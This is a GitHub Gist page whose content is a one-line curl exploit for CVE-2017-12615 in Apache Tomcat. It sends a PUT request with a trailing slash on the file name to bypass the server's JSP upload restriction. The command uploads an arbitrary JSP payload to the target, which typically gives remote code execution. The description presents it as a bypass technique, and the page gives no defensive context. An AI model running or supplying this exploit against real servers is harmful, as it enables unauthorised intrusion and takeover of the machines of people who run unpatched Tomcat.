Created
July 15, 2018 19:00
-
-
Save cmaggiulli/ae7982f5c4f07126372b12f2e6da7df1 to your computer and use it in GitHub Desktop.
CVE-2017-12615 bypass the jsp file type restriction on put requests for affected tomcat servers by appending a forward slash to the end of the fie name.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -X PUT http://url:port/payload.jsp/ -d @- < payload.jsp |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment